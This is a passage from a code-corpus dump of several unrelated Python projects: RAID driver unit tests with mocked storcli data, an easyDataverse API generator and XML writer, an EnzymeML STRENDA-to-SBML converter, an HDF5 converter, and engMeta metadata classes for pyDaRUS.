},
{
'index': 4,
'extra': {
'port': '3I',
'box': '2',
'bay': '1'
}
},
]
random.shuffle(drives)
self.dummy_actions.sort_drives(drives)
for idx in range(5):
assert drives[idx]['index'] == idx
# Free test here testing for missing status
def test_drive_status_failure(self):
drives = [
{
'port': '2I',
'box': '2',
'bay': '1',
'status': '????',
'size': 100
}
]
self.assertRaises(RAIDAbstractionException, self.dummy_actions.transform_physical_drives, *(drives,))
def test_create(self):
assert self.dummy_actions.create_logical_drive(0, '10', [10, 11, 12, 13])
assert self.dummy_actions.create_logical_drive(0, '10', [10, 11, 12, 13], size='10GiB')
assert self.dummy_actions.create_logical_drive(0, '6', array=0)
def test_delete_logical_drive(self):
assert self.dummy_actions.delete_logical_drive(0, 0, 0)
self.assertRaises(RAIDAbstractionException, self.dummy_actions.delete_logical_drive, *(0, 0, 100))
def test_clear_configuration(self):
assert self.dummy_actions.clear_configuration(0)
def test_add_spares(self):
assert self.dummy_actions.add_spares(0, [10, 11])
assert self.dummy_actions.add_spares(0, [10], [0])
def test_get_bad_adapter_info(self):
self.assertRaises(RAIDAbstractionException, self.dummy_actions.get_adapter_info, *(100, ))
def test_get_adapter_info(self):
adapter_info = self.dummy_actions.get_adapter_info(0)
self.assertEqual(adapter_info['total_drives'], 26)
self.assertEqual(adapter_info['total_size'], 7800000000000)
```
#### File: unit/raid_abstraction/test_megaraid.py
```python
import json
import os
import mock
from mercury.common.helpers.cli import CLIResult
from mercury_agent.hardware.drivers.megaraid import MegaRAIDActions, \
MegaRaidSASDriver
from mercury_agent.hardware.raid.abstraction.api import RAIDAbstractionException
from ..base import MercuryAgentUnitTest
def get_storcli_dall_show(c):
""" Gets data from json resource
:param c: unused
:return:
"""
del c
with open(os.path.join(os.path.dirname(__file__),
'../resources/storcli_dall_show.json')) as fp:
data = json.load(fp)
controller_list = []
for controller in data['Controllers']:
# Account for some crazy JSON schema
controller_list.append(
controller['Response Data']['Response Data']
)
return controller_list
def get_controllers():
""" Gets controller information from json resource
:return:
"""
with open(os.path.join(os.path.dirname(__file__),
'../resources/storcli.json')) as fp:
return [c['Response Data'] for c in json.load(fp)['Controllers']]
class DummyMegaRAIDActions(MegaRAIDActions):
""" A dummy megaraid actions driver for easier patching """
def __init__(self):
super(MegaRAIDActions, self).__init__()
self.storcli = mock.Mock()
# controllers is a property
self.storcli.controllers = get_controllers()
self.storcli.get_disk_group = get_storcli_dall_show
class TestMegaRAIDActions(MercuryAgentUnitTest):
""" MegaRAIDActions Test Case """
def setUp(self):
""" Instantiates a dummy module for use in test methods """
super(TestMegaRAIDActions, self).setUp()
self.dummy_actions = DummyMegaRAIDActions()
def test_transform_configuration(self):
""" Test overall transform operations """
configuration = self.dummy_actions.transform_configuration(0)
self.assertTrue(len(configuration['arrays']) == 2)
self.assertEqual(configuration['arrays'][0]['free_space'], 0)
self.assertEqual(
configuration['arrays'][1]['physical_drives'][1]['extra']
['address'], '32:2')
self.assertEqual(
MegaRAIDActions.get_array_index_by_dg(
configuration['arrays'], 1), 1)
self.assertEqual(
MegaRAIDActions.get_array_index_by_dg(
configuration['arrays'], 99), -1)
def test_without_available_drives(self):
dg_info = get_storcli_dall_show(0)
del dg_info[0]['UN-CONFIGURED DRIVE LIST']
new_dummy_actions = DummyMegaRAIDActions()
new_dummy_actions.storcli.get_disk_group = mock.Mock()
new_dummy_actions.storcli.get_disk_group.return_value = dg_info
configuration = new_dummy_actions.transform_configuration(0)
self.assertFalse(configuration['unassigned'])
self.assertFalse(configuration['spares'])
def test_with_global_hotspare(self):
""" Convert stored data so that it contains a GHS"""
dg_info = get_storcli_dall_show(0)
for drive in dg_info[0]['UN-CONFIGURED DRIVE LIST']:
if drive['State'] == 'DHS':
drive['State'] = 'GHS'
drive['DG'] = '-'
new_dummy_actions = DummyMegaRAIDActions()
new_dummy_actions.storcli.get_disk_group = mock.Mock()
new_dummy_actions.storcli.get_disk_group.return_value = dg_info
configuration = new_dummy_actions.transform_configuration(0)
self.assertEqual(configuration['spares'][0]['extra']['spare_type'],
'global')
def test_with_no_hotspare(self):
dg_info = get_storcli_dall_show(0)
for drive in dg_info[0]['UN-CONFIGURED DRIVE LIST']:
if drive['State'] in DummyMegaRAIDActions.hotspare_map:
drive['State'] = 'UGood' # UGood, bro?
drive['DG'] = '-'
new_dummy_actions = DummyMegaRAIDActions()
new_dummy_actions.storcli.get_disk_group = mock.Mock()
new_dummy_actions.storcli.get_disk_group.return_value = dg_info
configuration = new_dummy_actions.transform_configuration(0)
self.assertFalse(configuration['spares'])
def test_transform_adapter_info(self):
adapter_info = self.dummy_actions.transform_adapter_info(0)
self.assertEqual(adapter_info['name'], 'PERC 6/i Integrated')
self.assertEqual(MegaRAIDActions.get_controller_id(adapter_info),
0)
self.assertRaises(RAIDAbstractionException,
self.dummy_actions.transform_adapter_info, *(100,))
@mock.patch('mercury_agent.hardware.raid.interfaces.megaraid.storcli.cli')
@mock.patch('mercury_agent.hardware.drivers.megaraid.get_configuration')
def test_real_init(self, mock_get_configuration, mock_cli):
""" Tests real class __init__ method
:param mock_get_configuration:
:param mock_cli:
:return:
"""
mock_cli.run.return_value = CLIResult('', '', 0)
mock_cli.find_in_path.return_value = '/sbin/storcli64'
mock_get_configuration.return_value = {}
assert MegaRAIDActions()
def test_get_vendor_info_static(self):
""" Tests get_vendor_info static method"""
adapter = {
'Basics': {},
'Version': {},
'Bus': {},
'Status': {},
'Supported Adapter Operations': {},
'Supported PD Operations': {},
'Supported VD Operations': {}
}
result = MegaRAIDActions.get_vendor_info(adapter)
keys = [
'general',
'version_info',
'bus',
'status',
'supported_adapter_ops',
'supported_pd_ops',
'supported_vd_ops',
'bbu_info',
]
missing = []
for key in keys:
if key not in result:
missing.append(key)
self.assertFalse(missing, 'Missing keys in output {}'.format(missing))
def test_sort_drives_static(self):
""" Test drive sorting """
drives = [
{
'extra':
{
'drive_id': 10
}
},
{
'extra':
{
'drive_id': 5
}
},
{
'extra':
{
'drive_id': 7
}
},
{
'extra':
{
'drive_id': 0
}
},
]
MegaRAIDActions.sort_drives(drives)
self.assertEqual(drives[0]['extra']['drive_id'], 0)
self.assertEqual(drives[1]['extra']['drive_id'], 5)
self.assertEqual(drives[2]['extra']['drive_id'], 7)
self.assertEqual(drives[3]['extra']['drive_id'], 10)
def test_create(self):
""" Test create implementation """
# Data does not have available drives, create one
dg_info = get_storcli_dall_show(0)
for drive in dg_info[0]['UN-CONFIGURED DRIVE LIST']:
drive['State'] = 'UGood'
drive['DG'] = '-'
new_dummy_actions = DummyMegaRAIDActions()
new_dummy_actions.storcli.get_disk_group = mock.Mock()
new_dummy_actions.storcli.get_disk_group.return_value = dg_info
adapter_info = new_dummy_actions.transform_adapter_info(0)
drives = new_dummy_actions.get_drives_from_selection(0, [3])
new_dummy_actions.create(adapter_info, 0, drives=drives)
for drive in drives:
drive['extra']['vendor_state'] = 'UBad'
self.assertRaises(RAIDAbstractionException, new_dummy_actions.create,
*(adapter_info, 0, drives))
def test_delete_logical_drive(self):
""" Test delete_logical_drive implementation """
self.dummy_actions.storcli.delete = mock.Mock()
self.dummy_actions.delete_logical_drive(0, 0, 0)
self.dummy_actions.storcli.delete.assert_called_with(**{
'controller': 0,
'virtual_drive': 0
})
self.assertRaises(RAIDAbstractionException,
self.dummy_actions.delete_logical_drive,
*(0, 0, 99))
def test_clear_configuration(self):
self.dummy_actions.storcli.delete = mock.Mock()
self.dummy_actions.clear_configuration(0)
self.dummy_actions.storcli.delete.assert_called_with(
**{
'controller': 0,
'virtual_drive': 'all'
}
)
def test_add_spares(self):
""" Test create implementation """
# Data does not have available drives, create one
dg_info = get_storcli_dall_show(0)
for drive in dg_info[0]['UN-CONFIGURED DRIVE LIST']:
drive['State'] = 'UGood'
drive['DG'] = '-'
new_dummy_actions = DummyMegaRAIDActions()
new_dummy_actions.storcli.get_disk_group = mock.Mock()
new_dummy_actions.storcli.get_disk_group.return_value = dg_info
new_dummy_actions.storcli.add_hotspare = mock.Mock()
new_dummy_actions.add_spares(0, [3])
new_dummy_actions.storcli.add_hotspare.assert_called_with(**{
'controller': 0,
'enclosure': 32,
'slot': 3,
'disk_groups': []
})
new_dummy_actions.add_spares(0, [3], [0])
new_dummy_actions.storcli.add_hotspare.assert_called_with(**{
'controller': 0,
'enclosure': 32,
'slot': 3,
'disk_groups': [0]
})
self.assertRaises(RAIDAbstractionException,
new_dummy_actions.add_spares,
*(0, [3], [99]))
class MercuryMegaRaidDSDriverTest(MercuryAgentUnitTest):
def setUp(self):
super(MercuryMegaRaidDSDriverTest, self).setUp()
self.pci_data = [{'class_id': '0104',
'class_name': 'RAID bus controller',
'device_id': '005d',
'device_name': 'MegaRAID SAS-3 3108 [Invader]',
'driver': 'megaraid_sas',
'revision': '02',
'sdevice_id': '1f49',
'sdevice_name': 'PERC H730 Mini',
'slot': '02:00.0',
'svendor_id': '1028',
'svendor_name': 'Dell',
'vendor_id': '1000',
'vendor_name': 'LSI Logic / Symbios Logic'}]
def test_probe(self):
self.assertEqual(MegaRaidSASDriver.probe(self.pci_data), ['02:00.0'])
@mock.patch('mercury_agent.hardware.raid.interfaces.megaraid.storcli.cli')
@mock.patch('mercury_agent.hardware.drivers.megaraid.get_configuration')
    def test_inspect(self, mock_get_configuration, mock_cli):
driver = MegaRaidSASDriver(['02:00.0'])
driver.handler = mock.Mock()
driver.handler.get_adapter_info = mock.Mock()
mock_cli.run.return_value = CLIResult('', '', 0)
mock_cli.find_in_path.return_value = '/sbin/storcli64'
mock_get_configuration.return_value = {}
driver.inspect()
driver.handler.get_adapter_info.assert_called_with(0)
``` |
{
"source": "JR-1991/easyDataverse",
"score": 2
} |
#### File: easyDataverse/easyDataverse/api_generator.py
```python
import argparse
import os
import glob
import yaml
import json
import logging
import coloredlogs
from jinja2 import Template
from typing import Callable
from importlib import resources as pkg_resources
from easyDataverse.tools import templates as jinja_templates
from easyDataverse.tools.clsmod import generate_metadatablock_code
from easyDataverse.tools.restmod import generate_rest_api_code
from easyDataverse.tools.filehandling import create_init_line_metadatblock, create_init_line_library, generate_template
class MyDumper(yaml.Dumper):
"""Used to fix the bad indentation from pyaml"""
def increase_indent(self, flow=False, indentless=False):
return super(MyDumper, self).increase_indent(flow, False)
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--path", required=True,
type=str, help="Path to the TSV files describing metadatablocks.")
parser.add_argument("-o", "--out", required=True,
type=str, help="Path to which the API will be written.")
parser.add_argument("-n", "--name", required=True,
type=str, help="Name of the generated API.")
parser.add_argument("-l", "--logger", required=False, default="INFO",
type=str, help="Name of the generated API.")
args = vars(parser.parse_args())
# Logger
global logger
logger = logging.getLogger(__name__)
coloredlogs.install(level=args["logger"])
# Parse args to global variables
path = os.path.abspath(os.path.join(args["path"]))
out = os.path.abspath(os.path.join(args["out"]))
name = args["name"]
# Process args
project_path = os.path.join(out, name)
lib_path = os.path.join(out, name, name)
metadatablock_loc = os.path.join(out, name, name, "metadatablocks")
schema_loc = os.path.join(out, name, name, "metadatablocks", "schemas")
template_loc = os.path.join(out, name, name, "templates")
# Create dir structure
os.makedirs(schema_loc, exist_ok=True)
os.makedirs(os.path.join(template_loc, "yaml"), exist_ok=True)
os.makedirs(os.path.join(template_loc, "json"), exist_ok=True)
# Create metadatablock code
metadatablocks(path, metadatablock_loc, schema_loc, lib_path, name)
# Create setup file
setup(name, project_path)
# Create templates
templates(metadatablock_loc, template_loc)
# Generate REST API
generate_rest_api_code(metadatablock_loc, name, lib_path)
logger.info(
f"Created REST-API for {name}"
)
# Generate Dockerfile
docker_template = Template(
pkg_resources.read_text(
jinja_templates, "dockerfile.jinja2"
)
)
docker_out = os.path.join(project_path, "Dockerfile")
with open(docker_out, "w") as f:
f.write(
docker_template.render(lib_name=name)
)
logger.info(
f"Created library {name} in {os.path.abspath(project_path)}"
)
def metadatablocks(path: str, metadatablock_loc: str, schema_loc: str, lib_loc: str, lib_name: str) -> None:
"""Generates the metadatablock relevant files for the API."""
# Generate code for the metadatablocks
for block_path in glob.glob(os.path.join(path, "*.tsv")):
generate_metadatablock_code(block_path, metadatablock_loc, schema_loc)
logger.info(f"Generated metadatablock code for {block_path}")
    # Get the corresponding module names from the files
module_search = os.path.join(metadatablock_loc, "*.py")
# Write __init__ files
write_imports(
module_search,
lib_loc,
"library_init.jinja2",
create_init_line_library,
lib_name
)
write_imports(
module_search,
metadatablock_loc,
"metadatablock_init.jinja2",
create_init_line_metadatblock,
lib_name
)
def write_imports(
module_search: str,
path: str,
template_path: str,
fun: Callable,
lib_name: str
):
"""Extract module names, creates imports via a function and writes them to a path"""
imports = [
fun(module, lib_name)
for module in glob.glob(module_search)
if "__init__" not in module
]
with open(os.path.join(path, "__init__.py"), "w") as f:
template = Template(
pkg_resources.read_text(jinja_templates, template_path)
)
f.write(template.render(imports=imports, lib_name=lib_name))
def setup(name: str, project_path: str) -> None:
"""Generates the relevant setup file to install the API."""
requirements = [
"easyDataverse",
"fastapi",
"uvicorn",
"pydantic",
"jinja2",
"pyDataverse",
"pandas",
"pyaml"
]
# Initialize Jinja template
template = Template(
pkg_resources.read_text(jinja_templates, "setup.jinja2")
)
# Write to the API directory
setup_path = os.path.join(project_path, "setup.py")
with open(setup_path, "w") as f:
f.write(template.render(name=name, requirements=requirements))
# Write requirements.txt
requirements_path = os.path.join(project_path, "requirements.txt")
with open(requirements_path, "w") as f:
for req in requirements:
f.write(req + "\n")
def templates(metadatablock_loc: str, template_loc: str) -> None:
"""Generates templates which can then be used for mapping from file formats to Dataverse."""
    # Get the corresponding module names from the files
module_search = os.path.join(metadatablock_loc, "*.py")
for module in glob.glob(module_search):
if "__init__" in module:
continue
# Generate empty data model
block_name, data_model = generate_template(module)
# Write template to YAML
with open(os.path.join(template_loc, "yaml", f"{block_name}.yaml"), "w") as f:
yaml.dump(
data_model, f, sort_keys=False, default_flow_style=False, Dumper=MyDumper
)
# Write template to JSON
with open(os.path.join(template_loc, "json", f"{block_name}.json"), "w") as f:
json.dump(data_model, f, indent=2, sort_keys=False)
logger.info(
f"Created template for {block_name}."
)
if __name__ == "__main__":
main()
```
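A note on the `MyDumper` helper above: pyyaml's default `Dumper` writes block sequences flush with their parent key, which is why `increase_indent` is overridden so the generated YAML templates get indented lists. A quick standalone illustration (assumes only `pyyaml` is installed):
```python
import yaml

class MyDumper(yaml.Dumper):
    """Same override as above: always indent block sequences."""
    def increase_indent(self, flow=False, indentless=False):
        return super(MyDumper, self).increase_indent(flow, False)

data = {"citation": {"authors": [{"name": "Jane Doe"}]}}

print(yaml.dump(data, default_flow_style=False))
# citation:
#   authors:
#   - name: Jane Doe
print(yaml.dump(data, Dumper=MyDumper, default_flow_style=False))
# citation:
#   authors:
#     - name: Jane Doe
```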
#### File: easyDataverse/tools/xmltools.py
```python
from typing import Any, Tuple
from lxml import objectify, etree
from sdRDM.tools.utils import snake_to_camel
class XMLWriter:
@classmethod
def to_xml(
cls,
root_name: str,
values: dict,
props: dict,
to_string: bool = True
) -> objectify.ObjectifiedElement:
"""Writes the object data model to XML"""
# Initialize attrib/element mapping
attributes = {}
elements = []
# Collect attributes and elements
for name, value in values.items():
if name.startswith("__"):
continue
# Get xml class and data type
xml, data_type = cls._get_xml_specs(props[name])
# Treat all those cases
if xml == "attribute":
attributes.update({name: str(value)})
elif xml == "element":
elements.append(cls._make_element(
name, value, data_type
))
# Construct resulting element
root = objectify.Element(
root_name,
**attributes
)
root.extend(elements)
# Some cleanups
objectify.deannotate(root)
etree.cleanup_namespaces(root)
if to_string:
xml_string = etree.tostring(
root,
pretty_print=True,
xml_declaration=True
)
return xml_string.decode()
return root
@staticmethod
def _get_xml_specs(properties: dict) -> Tuple[str, str]:
"""Extracts the xml classification and type"""
def infer_property(key: str):
mapping = {
"xml": "element", # Make it an element if not otherwise stated
"type": "object"
}
try:
return properties[key]
except KeyError:
return mapping[key]
return (
infer_property("xml"),
infer_property("type")
)
@staticmethod
def _make_element(name: str, value: Any, data_type: str):
"""Creates elements based on their type and recursively
generated elements from other classes"""
name = snake_to_camel(name)
if data_type not in ["object", "array"]:
# Primitive types
elem = etree.Element(name)
elem.text = str(value)
return elem
# Process nested types
elem = objectify.Element(name)
if data_type == "object":
elem.extend([value.to_xml(to_string=False)])
elif data_type == "array":
elem.extend([entry.to_xml(to_string=False) for entry in value])
else:
raise TypeError(f"Data type of {data_type} is unknown.")
return elem
``` |
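`XMLWriter.to_xml` above walks a dict of field values together with a pydantic-style `props` mapping, where each property may carry an `xml` hint (`"attribute"` or `"element"`) and a `type`; element tags go through `snake_to_camel`, so the exact casing depends on that helper. A minimal, hypothetical usage sketch with made-up field names:
```python
# Hedged example: one attribute plus one primitive element, no nested objects or arrays.
values = {"id": 42, "title": "Test dataset"}
props = {
    "id": {"xml": "attribute", "type": "integer"},
    "title": {"xml": "element", "type": "string"},
}

print(XMLWriter.to_xml("Dataset", values, props))
# Roughly:
# <?xml version='1.0' encoding='ASCII'?>
# <Dataset id="42">
#   <Title>Test dataset</Title>
# </Dataset>
```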
{
"source": "JR-1991/EnzymeML",
"score": 2
} |
#### File: enzymeml/strenda/converter.py
```python
import sys
import xml.sax
from libsbml import UNIT_KIND_MOLE, UNIT_KIND_SECOND, \
writeSBMLToFile, writeSBMLToString
from enzymeml import utils
class StrendaHandler(xml.sax.ContentHandler):
'''STRENDA-DB handler.'''
def __init__(self):
xml.sax.ContentHandler.__init__(self)
self.__document, self.__model, self.__compartment = \
utils.get_document()
self.__start = False
self.__element_name = None
self.__species = None
self.__uniprot_id = None
self.__reaction = None
self.__spec_ref = None
self.__kinetic_law = None
self.__reaction_notes = ''
self.__parent = None
def startElement(self, name, attrs):
self.__start = True
self.__element_name = name
if name == 'experiment':
self.__document.setId(attrs['strendaId'])
elif name == 'assayConditions':
self.__parent = name
elif name == 'protein':
self.__uniprot_id = attrs['uniprotKbAC']
elif name == 'dataset':
self.__add_reaction(attrs)
self.__add_protein()
elif name == 'smallCompound':
self.__add_small_compound(name, attrs)
elif name == 'macromolecule':
self.__add_macromolecule(name, attrs)
elif name == 'kineticParameter':
self.__parent = name
elif name == 'value':
self.__add_value(attrs)
def endElement(self, name):
self.__start = False
if name == 'dataset':
if self.__reaction_notes:
utils.set_notes(self.__reaction, self.__reaction_notes.strip())
self.__reaction = None
def characters(self, content):
if self.__start and content.strip() and content != 'null':
if self.__element_name == 'name' and self.__species:
self.__species.setName(content)
elif self.__element_name == 'cid':
utils.add_annotation(
self.__species,
'http://identifiers.org/pubchem.compound/' + content)
elif self.__element_name == 'chebiId':
utils.add_annotation(self.__species,
'http://identifiers.org/chebi/CHEBI:' +
content)
elif self.__element_name == 'inchi':
utils.add_annotation(self.__species,
'http://identifiers.org/inchi/' + content)
elif self.__element_name == 'stoichiometry':
self.__spec_ref.setStoichiometry(float(content))
elif self.__element_name == 'commentOnProteinReaction':
self.__reaction_notes = self.__reaction_notes + content + '\n'
def write_sbml_to_file(self, filename):
'''Write SBML to file.'''
writeSBMLToFile(self.__document, filename)
def write_sbml_to_string(self):
'''Write SBML to string.'''
return writeSBMLToString(self.__document)
def __add_small_compound(self, name, attrs):
'''Add small compound.'''
species_id = utils.get_id(attrs['refId'])
if attrs['role'] == 'Substrate':
self.__species, self.__spec_ref = \
utils.add_substrate(self.__model, self.__reaction,
species_id,
self.__compartment.getId(),
name)
elif attrs['role'] == 'Product':
self.__species, self.__spec_ref = \
utils.add_product(self.__model, self.__reaction,
species_id,
self.__compartment.getId(),
name)
else:
self.__species = \
utils.add_non_participant(self.__model,
species_id,
self.__compartment.getId(),
sbo_term=247)
self.__parent = name
def __add_protein(self):
'''Add protein.'''
species_id = utils.get_id(self.__uniprot_id)
if not self.__model.getSpecies(species_id):
self.__species = utils.add_enzyme(self.__model,
self.__reaction,
species_id,
self.__compartment.getId(),
uniprot_id=self.__uniprot_id)
def __add_macromolecule(self, name, attrs):
'''Add macromolecule.'''
species_id = utils.get_id(attrs['refId'])
sbo_term = 252 if attrs['moleculeClass'] == 'Protein' else 0
self.__species = \
utils.add_non_participant(self.__model,
species_id,
self.__compartment.getId(),
sbo_term=sbo_term)
self.__parent = name
def __add_reaction(self, attrs):
'''Add reaction.'''
self.__reaction = utils.add_reaction(self.__model, attrs['name'])
self.__kinetic_law = self.__reaction.createKineticLaw()
def __add_value(self, attrs):
'''Add value.'''
if attrs['type'] == 'Concentration':
conc, units = self.__get_value_units(float(attrs['value']),
attrs['unit'])
self.__species.setInitialAmount(conc)
self.__species.setUnits(units)
elif attrs['type'] == 'ConcentrationRange':
start_conc, start_units = \
self.__get_value_units(float(attrs['startValue']),
attrs['unit'])
end_conc, end_units = \
self.__get_value_units(float(attrs['endValue']),
attrs['unit'])
self.__species.setInitialAmount(start_conc)
self.__species.setUnits(start_units)
self.__species.setConstant(False)
elif self.__parent == 'kineticParameter':
self.__add_parameter(attrs)
def __add_parameter(self, attrs):
'''Add parameter.'''
value, units = self.__get_value_units(float(attrs['value']),
attrs['unit'])
if attrs['name'] == 'kcat':
sbo_term = 25
elif attrs['name'] == 'km':
sbo_term = 373
else:
sbo_term = 0
utils.add_parameter(self.__kinetic_law, value, units, attrs['name'],
sbo_term)
def __get_value_units(self, value, units):
'''Get value and units.'''
if units == 'mM':
value = value / 10 ** 3
units = 'mole'
elif units == 'microM':
value = value / 10 ** 6
units = 'mole'
elif units == 'nM':
value = value / 10 ** 9
units = 'mole'
elif units == 'units-ml1':
value = value * 10 ** 3
units = 'item'
elif units == 's-1':
unit_def_id = 's_1'
if not self.__model.getUnitDefinition(unit_def_id):
unit_def = self.__model.createUnitDefinition()
unit_def.setId(unit_def_id)
unit_def.setName(unit_def.getName())
unit = unit_def.createUnit()
unit.setScale(1)
unit.setMultiplier(1)
unit.setExponent(-1)
unit.setKind(UNIT_KIND_SECOND)
units = unit_def_id
elif units == 'M-1S-1':
unit_def_id = 'M_1S_1'
if not self.__model.getUnitDefinition(unit_def_id):
unit_def = self.__model.createUnitDefinition()
unit_def.setId(unit_def_id)
unit_def.setName(unit_def.getName())
unit = unit_def.createUnit()
unit.setScale(1)
unit.setMultiplier(1)
unit.setExponent(1)
unit.setKind(UNIT_KIND_MOLE)
unit = unit_def.createUnit()
unit.setScale(1)
unit.setMultiplier(1)
unit.setExponent(-1)
unit.setKind(UNIT_KIND_SECOND)
units = unit_def_id
return value, units
def convert(in_filename, out_filename='strenda_sbml.xml'):
'''Convert file.'''
parser = xml.sax.make_parser()
handler = StrendaHandler()
parser.setContentHandler(handler)
with open(in_filename, 'r') as fle:
parser.parse(fle)
handler.write_sbml_to_file(out_filename)
def main(args):
'''main method.'''
convert(*args)
if __name__ == '__main__':
main(sys.argv[1:])
```
#### File: EnzymeML/hdf5/converter.py
```python
import re
import sys
import h5py
import numpy as np
import pandas as pd
def convert(in_filename, out_filename='out.hdf5'):
'''Convert Pandas to hdf5.'''
df = pd.read_csv(in_filename, sep='\t', dtype=np.float64)
df.name = 'timeseries'
# Remove hashtag:
df.columns = [re.sub(r'#\s+', '', col) for col in df.columns]
# Set index to be time:
df.set_index('Time', inplace=True)
# Remove empty columns:
df.dropna(axis=1, how='all', inplace=True)
# Write to hdf5:
df.to_hdf(out_filename, key=df.name, format='table', data_columns=True,
mode='w')
return out_filename
def read_hdf(filename):
'''Read hdf5 file.'''
fle = h5py.File(filename, 'r')
for key, value in fle.items():
print(key, value, value.attrs.keys())
for key, val in value.items():
print(key, val, val.attrs.keys())
def main(args):
'''main method.'''
out_filename = convert(*args)
read_hdf(out_filename)
# Write to csv:
pd.read_hdf(out_filename).to_csv('out.csv')
if __name__ == '__main__':
main(sys.argv[1:])
``` |
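`convert` above expects a tab-separated file whose header row starts with a hash (for example `# Time`, `S1`, `S2` separated by tabs), strips the hash, indexes on `Time`, and writes a `table`-format HDF5 dataset under the key `timeseries`; `to_hdf` needs PyTables installed. A small end-to-end sketch with illustrative file names:
```python
import pandas as pd

# Write a minimal TSV in the shape the converter expects (hash-prefixed header).
with open("timeseries.tsv", "w") as fh:
    fh.write("# Time\tS1\tS2\n")
    fh.write("0.0\t1.0\t2.0\n")
    fh.write("1.0\t0.9\t2.1\n")

out = convert("timeseries.tsv", "timeseries.hdf5")  # convert() from the module above
df = pd.read_hdf(out, key="timeseries")
print(df)  # two rows indexed by Time, with columns S1 and S2
```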
{
"source": "JR-1991/pyDaRUS",
"score": 3
} |
#### File: pyDaRUS/metadatablocks/engMeta.py
```python
from __future__ import annotations
from enum import Enum
from typing import List, Optional, Union
from easyDataverse.core import DataverseBase
from pydantic import Field
class DataGeneration(Enum):
"""
Approach to data generation
"""
simulation = 'Simulation'
analysis = 'Analysis'
experiment = 'Experiment'
prediction = 'Prediction'
class SystemParameters(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of the parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaSystemParName',
)
symbol: Optional[str] = Field(
None,
description='The symbol used to describe this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaSystemParSymbol',
)
unit: Optional[str] = Field(
None,
description='The unit or scale of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaSystemParUnit',
)
value: Optional[float] = Field(
None,
description='The (numerical) value of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaSystemParValue',
)
textual_value: Optional[str] = Field(
None,
description='The value of this system parameter (for non numerical values).',
multiple=False,
typeClass='primitive',
typeName='engMetaSystemParTextValue',
)
class MeasuredVariables(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarName',
)
symbol: Optional[str] = Field(
None,
description='The symbol used to describe this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarSymbol',
)
unit: Optional[str] = Field(
None,
description='The unit or scale of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarUnit',
)
error: Optional[float] = Field(
None,
description='A value for the uncertainty of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarError',
)
error_description: Optional[str] = Field(
None,
description='The type the error is measured (e.g. standard deviation, percentage, …)',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarErrorDesc',
)
minimum_value: Optional[float] = Field(
None,
description='The minimum value of this variable (use for ranges)',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarValueFrom',
)
maximum_value: Optional[float] = Field(
None,
description='The maximum value of this variable (use for ranges)',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarValueTo',
)
textual_value: Optional[str] = Field(
None,
description='The value of this measured variable (for non numerical values).',
multiple=False,
typeClass='primitive',
typeName='engMetaMeasuredVarTextValue',
)
class SystemOrPhaseComponents(DataverseBase):
id: Optional[int] = Field(
None,
description='Unique number that can be referred to in the metadata. Use if Name is not unique.',
multiple=False,
typeClass='primitive',
typeName='engMetaCompId',
)
name: Optional[str] = Field(
None,
description='Name of this component.',
multiple=False,
typeClass='primitive',
typeName='engMetaCompName',
)
description: Optional[str] = Field(
None,
description='Description of the component.',
multiple=False,
typeClass='primitive',
typeName='engMetaCompDescription',
)
inchicode: Optional[str] = Field(
None,
description='The IUPAC International Chemical Identifier',
multiple=False,
typeClass='primitive',
typeName='engMetaCompInChI',
)
smilescode: Optional[str] = Field(
None,
description='Simplified Molecular Input Line Entry Specification',
multiple=False,
typeClass='primitive',
typeName='engMetaCompSmilesCode',
)
iupac_name: Optional[str] = Field(
None,
description='Chemical nomenclature created and developed by the International Union of Pure and Applied Chemistry (IUPAC)',
multiple=False,
typeClass='primitive',
typeName='engMetaCompIUPAC',
)
quantity: Optional[str] = Field(
None,
description='The amount of this component.',
multiple=False,
typeClass='primitive',
typeName='engMetaCompQuantity',
)
unit: Optional[str] = Field(
None,
description='The unit in which the amount is measured.',
multiple=False,
typeClass='primitive',
typeName='engMetaCompUnit',
)
force_field: Optional[str] = Field(
None,
description='Name of the force field belonging to this component (detailed information about the force field should be given under Force Field Parameters).',
multiple=False,
typeClass='primitive',
typeName='engMetaCompForcefield',
)
class ControlledVariables(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarName',
)
symbol: Optional[str] = Field(
None,
description='The symbol used to describe this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarSymbol',
)
unit: Optional[str] = Field(
None,
description='The unit or scale of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarUnit',
)
value: Optional[float] = Field(
None,
description='The (single) value of this variable.',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarValue',
)
minimum_value: Optional[float] = Field(
None,
description='The minimum value of this variable (use for ranges)',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarValueFrom',
)
maximum_value: Optional[float] = Field(
None,
description='The maximum value of this variable (use for ranges)',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarValueTo',
)
textual_value: Optional[str] = Field(
None,
description='The value of this controlled variable (for non numerical values).',
multiple=False,
typeClass='primitive',
typeName='engMetaControlledVarTextValue',
)
class ForceFieldParameters(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of the parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldParName',
)
symbol: Optional[str] = Field(
None,
description='The symbol used to describe this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldParSymbol',
)
unit: Optional[str] = Field(
None,
description='The unit or scale of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldParUnit',
)
value: Optional[float] = Field(
None,
description='The value of this parameter.',
multiple=False,
typeClass='primitive',
typeName='engMetaForcefieldParValue',
)
class Flows(DataverseBase):
name: Optional[str] = Field(
None,
description='Name of the flow.',
multiple=False,
